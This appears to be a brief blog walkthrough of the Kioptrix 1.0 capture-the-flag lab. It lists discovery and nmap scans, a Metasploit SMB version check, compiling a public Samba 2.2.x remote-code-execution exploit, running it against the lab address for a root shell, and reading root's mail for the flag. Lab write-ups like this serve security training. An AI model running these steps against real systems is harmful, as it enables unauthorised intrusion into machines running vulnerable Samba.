root@blog:~#

View on GitHub

Kioptrix1.0

RECON

Discovery

netdiscover -i eth1

192.168.57.1, 192.168.57.5 have open ports image9

Nmap Scan

namp -sC -sV -A 192.168.57.5

-safescan -version -OS detection
Port 139 running Samba
image6

Version Scan

msfconsole
use auxiliary/scanner/smb/smb-version

Samba Version 2.2.1 image1

Google-Fu

samba 2.2.1a exploit

2.2.8 RCE
image7
image4

ENUMURATION

Save Exploit
image5

Make executable copy

gcc 10.c -o 10

GNU compiler outputs copy to executable file
image8

Root Escalation

Shell

./10 -b 0 192.168.57.5

-Bruteforce linux
image10

Root Flag

head -n 100 /var/spool/mail/root

image2